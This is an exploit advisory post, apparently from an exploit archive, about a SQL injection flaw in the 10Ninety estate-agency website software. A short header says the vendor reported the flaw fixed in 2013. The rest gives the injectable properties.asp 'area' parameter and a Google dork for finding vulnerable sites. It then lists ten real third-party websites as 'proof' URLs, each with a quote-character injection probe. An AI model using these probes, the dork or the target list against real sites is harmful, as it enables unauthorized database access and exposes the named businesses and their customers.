Sites powered by 10Ninety suffered from a remote SQL injection vulnerability. The vendor contacted Packet Storm security on 11/26/2013 to note that the issue has been resolved.
4acffec063f609db9abce0fde65827bc
#********************************************************************************
# Exploit Title : 10Ninety Sql injection vulnerability
#
# Software link : www.10ninety.co.uk
#
# Exploit Author : Ashiyane Digital Security Team
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Powered By 10Ninety"
#
# Date: 2013/08/30
#
--------------------------------------------------------------------
# - Location : [Target]/properties.asp?area=[Sql Injection]
#
# Proof:
#
# http://www.apropertycycle.co.uk/properties.asp?area=1'
#
# http://www.affittoletting.com//properties.asp?area=1'
#
# http://www.assetestates.co.uk/properties.asp?area=1'
#
# http://www.alisongeorge.com/properties.asp?area=1'
#
# http://www.cotswoldlettings.co.uk/properties.asp?area=1'
#
# http://www.fidelisproperties.co.uk/properties.asp?area=1'
#
# http://www.greeneyeproperty.com/properties.asp?area=1'
#
# http://www.sellectlets.co.uk/properties.asp?area=1'
#
# http://www.stuartsresidential.com/properties.asp?area=1'
#
# http://www.perfect-pads.co.uk/properties.asp?area=1'
#
######################
discovered by : ACC3SS
######################
Comments
Subscribe to this comment feedNo comments yet, be the first!